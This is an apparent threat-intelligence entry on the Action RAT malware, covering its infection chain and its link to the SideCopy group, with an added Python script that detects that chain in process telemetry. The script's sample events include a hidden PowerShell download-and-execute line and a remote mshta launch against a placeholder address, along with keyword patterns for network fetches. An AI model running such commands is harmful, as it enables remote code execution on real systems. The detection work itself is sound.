Action RAT is malicious software (malware) used by cyber threat actors to exploit and damage computer systems. Written in Delphi and compiled on October 2, 2021, it is part of an arsenal that also includes other Remote Access Trojans (RATs) such as AllaKore RAT, Reverse RAT, and Margulas RAT. It reaches systems through deceptive means such as suspicious downloads, emails, or websites, often without the user noticing. Once inside a system, Action RAT can steal personal information, disrupt operations, or hold data for ransom. Its delivery relies on fileless payload execution via .hta files, which deploy one of the associated RATs, such as AllaKore RAT or Action RAT itself.
Throughout the year, new attack campaigns involving Action RAT have been observed almost monthly, with evolving tactics, techniques, and procedures (TTPs). These include additional stages using Double Action RAT, a new .NET-based RAT, and uncovered instances of PowerShell remote execution. Infection typically begins when a .LNK file is executed; it retrieves an HTML application (HTA) from a remote server. That HTA displays a decoy while stealthily deploying the Action RAT backdoor. The chain then concatenates multiple HTML applications, ultimately dropping an Action RAT variant whose files mimic essential Windows components.
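The chain above (a .LNK launch, an HTA fetched from a remote server, and a PowerShell remote-execution stage) leaves a recognisable trace in process-creation telemetry. The following is an added illustration of that detection logic, not code from the page or from any vendor: it assumes that HTAs are hosted by mshta.exe (standard Windows behaviour, not stated on the page), a constructed tab-separated event format, and constructed sample events using a TEST-NET address.

```python
import re

# Assumed telemetry format (constructed for this illustration): one process-creation
# event per line, tab-separated as  parent-image <TAB> child-image <TAB> command line.
SAMPLE_LOG = [
    "explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta.exe http://203.0.113.10/docs/report.hta",
    "mshta.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s1'))",
    "explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta.exe C:\\Users\\u\\setup.hta",
    "services.exe\tC:\\Windows\\System32\\svchost.exe\tsvchost.exe -k netsvcs",
]

REMOTE_URL = re.compile(r"https?://[^\s'\"()]+", re.I)
PS_FETCH = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "invoke-restmethod")

def parse_line(line):
    """Split one telemetry line into (parent, image, cmdline); images lower-cased for matching."""
    parent, image, cmdline = line.split("\t", 2)
    return parent.lower(), image.lower(), cmdline

def is_remote_hta_launch(parent, image, cmdline):
    # mshta.exe handed a URL: the HTA is pulled from a remote server rather than a local file
    return image.endswith("mshta.exe") and REMOTE_URL.search(cmdline) is not None

def is_remote_powershell(parent, image, cmdline):
    # PowerShell fetching a further stage over the network (the remote-execution stage)
    low = cmdline.lower()
    return image.endswith("powershell.exe") and any(k in low for k in PS_FETCH)

def classify(parent, image, cmdline):
    """Return the chain stages an event matches; empty list when nothing matches."""
    hits = []
    if is_remote_hta_launch(parent, image, cmdline):
        hits.append("mshta_remote_hta")
        if parent.endswith("explorer.exe"):  # a double-clicked .LNK appears as an explorer.exe child
            hits.append("lnk_initiated")
    if is_remote_powershell(parent, image, cmdline) and parent.endswith("mshta.exe"):
        hits.append("hta_to_powershell_remote")
    return hits

def scan(lines):
    """Return (line index, hits) for every event matching at least one stage of the chain."""
    results = []
    for idx, line in enumerate(lines):
        hits = classify(*parse_line(line))
        if hits:
            results.append((idx, hits))
    return results
```

The local-HTA event (index 2) is deliberately not flagged: the page's chain is specifically a remote fetch, and alerting on every mshta.exe launch would be noisy.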
The use of Action RAT has been linked to SideCopy, an advanced persistent threat (APT) group known for targeting India and Afghanistan. This group has employed Action RAT in numerous attacks against India, using spear-phishing for initial access and presenting research material as a decoy to plant the information-stealing malware. Detailed analysis of these campaigns and the payloads involved can be found in previous whitepapers and blog posts provided by our team.
Description last updated: 2024-05-05T02:53:07.628Z